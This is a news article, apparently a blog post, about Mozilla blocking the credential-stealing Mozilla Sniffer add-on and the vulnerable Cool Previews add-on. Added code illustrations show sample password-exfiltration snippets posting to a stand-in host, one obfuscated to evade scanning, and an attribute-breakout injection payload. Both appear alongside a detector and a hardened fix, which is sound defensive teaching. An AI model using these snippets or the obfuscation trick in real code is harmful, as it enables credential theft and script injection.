Mozilla Removes And Blocks 2 Firefox Add-ons
Mozilla has rarely had to pull the plug on add-ons hosted on the official Firefox add-on repository. That is largely due to the review process every add-on has to undergo before it is listed on the site.
The developers of the popular Firefox web browser have some tools at their disposal to deal with add-ons that are either malicious in nature or insecure.
A recent post on the Mozilla Add-ons blog revealed that Mozilla recently had to deal with two add-ons, one from each of those groups.
The first add-on, Mozilla Sniffer, contained code that intercepted login information and sent it to a remote server on the Internet.
The issue was discovered on July 12, six days after the add-on had been added to the Mozilla website as an experimental add-on. It was disabled immediately after a manual code review and added to the global blocklist.
A total of 1,800 installations were recorded before detection. Adding the add-on to the blocklist triggers an automatic uninstallation prompt for everyone who has it installed.
Firefox users who have or had Mozilla Sniffer installed should treat any credentials entered while it was active as compromised and change the login information for every site they have visited since installing the add-on, to prevent third parties from accessing their accounts.
All add-ons uploaded by developers to the Firefox add-on repository are scanned for malicious code; a manual review of the add-on follows later. The virus scan did not detect the "phone home" function, so the add-on was listed as an experimental add-on on the public website before anyone had read its code.
This verification process is obviously flawed. Malicious add-ons may not pass the initial scan often, but it has happened before.
Back in February two add-ons containing malicious code were discovered in the add-on repository. Mozilla responded by increasing the number of malware scanners and the frequency of the scans.
A new security model has been proposed that changes the review process so that only code-reviewed add-ons are visible to Firefox users on the add-ons website.
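To show why a signature scan of the kind described above can miss a "phone home" function while a human reader would not, here is an added illustration written for this article. It is not Mozilla's validator and the three add-on snippets it scans are constructed samples: one plain credential exfiltration, the same behaviour with its strings split and its URL base64-encoded, and a benign update check. The allowlisted host and collector host are made up, and the decoding step relies on Node's `Buffer`.

```javascript
// Added illustration (not Mozilla's scanner): a minimal upload-time heuristic
// that flags source which both reads password fields and sends data to a host
// the add-on has not declared, and a demonstration of how little obfuscation
// is needed to slip past it.

// Constructed sample 1: credential theft written in the plainest way.
const SAMPLE_PLAIN = `
var pw = doc.querySelector('input[type="password"]').value;
var req = new XMLHttpRequest();
req.open("POST", "http://collector.example/log");
req.send("u=" + user + "&p=" + pw);
`;

// Constructed sample 2: identical behaviour; the keywords are split into
// string pieces and the collector URL is base64-encoded ("http://collector.example/log").
const SAMPLE_OBFUSCATED = `
var pw = doc.querySelector('input[type="pass' + 'word"]').value;
var req = new window["XMLHttp" + "Request"]();
req.open("POST", atob("aHR0cDovL2NvbGxlY3Rvci5leGFtcGxlL2xvZw=="));
req.send("u=" + user + "&p=" + pw);
`;

// Constructed sample 3: a benign add-on that only talks to its own update host.
const SAMPLE_BENIGN = `
var req = new XMLHttpRequest();
req.open("GET", "https://updates.example/version.json");
req.send(null);
`;

const PASSWORD_READ = /type\s*=\s*["']password["']|\.password\b|passwd/i;
const NETWORK_SEND = /XMLHttpRequest|\.open\s*\(\s*["'](POST|GET)["']\s*,\s*["']https?:\/\//i;

// Literal http(s) URLs present in the source text.
function remoteUrls(src) {
  return src.match(/https?:\/\/[^\s"')]+/gi) || [];
}

function hostOf(url) {
  try { return new URL(url).host; } catch (e) { return null; }
}

// Naive signature scan: every behaviour must be visible as plain text.
function scanNaive(src, allowedHosts) {
  const foreignUrls = remoteUrls(src).filter((u) => !allowedHosts.includes(hostOf(u)));
  const readsPassword = PASSWORD_READ.test(src);
  const sendsRemote = NETWORK_SEND.test(src);
  return { readsPassword, sendsRemote, foreignUrls,
           suspicious: readsPassword && sendsRemote && foreignUrls.length > 0 };
}

// Cheap de-obfuscation before applying the same signatures: join adjacent
// string literals, decode atob("...") constants, and resolve window["Name"].
// Enough for sample 2, but a determined author can always go one step further,
// which is why the manual review step cannot be dropped.
function normalize(src) {
  let out = src;
  const joinRe = /"([^"\n]*)"\s*\+\s*"([^"\n]*)"|'([^'\n]*)'\s*\+\s*'([^'\n]*)'/;
  let prev;
  do {
    prev = out;
    out = out.replace(joinRe, (m, a, b, c, d) =>
      a !== undefined ? '"' + a + b + '"' : "'" + c + d + "'");
  } while (out !== prev);
  out = out.replace(/atob\(\s*["']([A-Za-z0-9+/=]+)["']\s*\)/g, (m, b64) => {
    try { return '"' + Buffer.from(b64, "base64").toString("utf8") + '"'; } catch (e) { return m; }
  });
  out = out.replace(/window\[\s*["']([A-Za-z_$][\w$]*)["']\s*\]/g, "$1");
  return out;
}

function scanNormalized(src, allowedHosts) {
  return scanNaive(normalize(src), allowedHosts);
}
```

Run against the three samples with `["updates.example"]` as the declared host, the naive scan flags only the plain sample; the normalized scan also catches the obfuscated one and still leaves the benign update check alone.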
Cool Previews was the second add-on the Mozilla developers had to deal with. A critical security vulnerability was discovered in version 3.0.1 of the add-on, which had more than 170,000 users.
The vulnerability can be triggered with a specially crafted hyperlink. If the user hovers the cursor over the link, the preview function executes remote JavaScript code with local chrome privileges, that is, with the same privileges as the browser itself, which gives the attacking script control over the host computer.
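The general pattern behind a bug of this class is privileged extension code that turns attacker-controlled link data into markup or script without treating it as untrusted. The following is an added illustration for this article, not Cool Previews' actual code and not a description of its specific flaw: a hover-preview builder in its vulnerable and hardened forms, fed a constructed malicious link. The link contents, the `preview` class name and the helper names are all made up.

```javascript
// Added illustration (not Cool Previews' code): a link-hover preview built
// from attributes the page author controls. If the vulnerable version's output
// is inserted into a chrome-privileged document (e.g. via innerHTML), the
// attacker's inline handler runs with the browser's own privileges.

// Constructed sample: a hyperlink as an attacker could place it on a web page.
const craftedLink = {
  href: "javascript:void(0)",                 // script URL instead of http(s)
  title: '"><img src=x onerror="alert(1)">',  // breaks out of the title attribute
  text: "Click me",
};

// VULNERABLE: untrusted strings concatenated straight into markup.
function buildPreviewUnsafe(link) {
  return '<div class="preview"><a href="' + link.href + '" title="' + link.title + '">' +
         link.text + "</a></div>";
}

// Escape the characters that matter in HTML text and attribute values.
function escapeHtml(s) {
  return String(s).replace(/[&<>"']/g, (c) => ({
    "&": "&amp;", "<": "&lt;", ">": "&gt;", '"': "&quot;", "'": "&#39;",
  })[c]);
}

// Only plain web URLs may be previewed; javascript:, data:, chrome:, file:
// and anything unparsable are refused rather than "repaired".
function safeUrl(raw) {
  let u;
  try { u = new URL(String(raw)); } catch (e) { return null; }
  return u.protocol === "http:" || u.protocol === "https:" ? u.href : null;
}

// HARDENED: every field is escaped as data, the URL is scheme-checked, and a
// link that fails the check produces no preview at all (fail closed).
function buildPreviewSafe(link) {
  const href = safeUrl(link.href);
  if (href === null) return null;
  return '<div class="preview"><a href="' + escapeHtml(href) + '" title="' +
         escapeHtml(link.title) + '">' + escapeHtml(link.text) + "</a></div>";
}

// Rough check used here to compare the two outputs; a real review would parse
// the markup rather than grep it.
function containsScriptHook(markup) {
  return /javascript:|on\w+\s*=|<script/i.test(markup);
}
```

The hardened builder still produces a preview for an ordinary `https:` link with awkward characters in its title, but returns `null` for the crafted one instead of trying to clean it up; in a privileged context the safest answer to untrusted input that does not fit the expected shape is to render nothing.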
Version 3.0.1 and earlier of Cool Previews have been disabled since the discovery. The developer of Cool Previews updated the add-on within a day of being notified; the new version is already available on the Mozilla website and as an update.
Add-on updates are displayed automatically to Firefox users. Additional information is provided in the Mozilla blog post.
The first add-on, Mozilla Sniffer, contained code that intercepted and send login information to a remove server on the Internet.
REMOTE server I take it? :)
Prophet, you are right; edited it, thanks for finding the typo.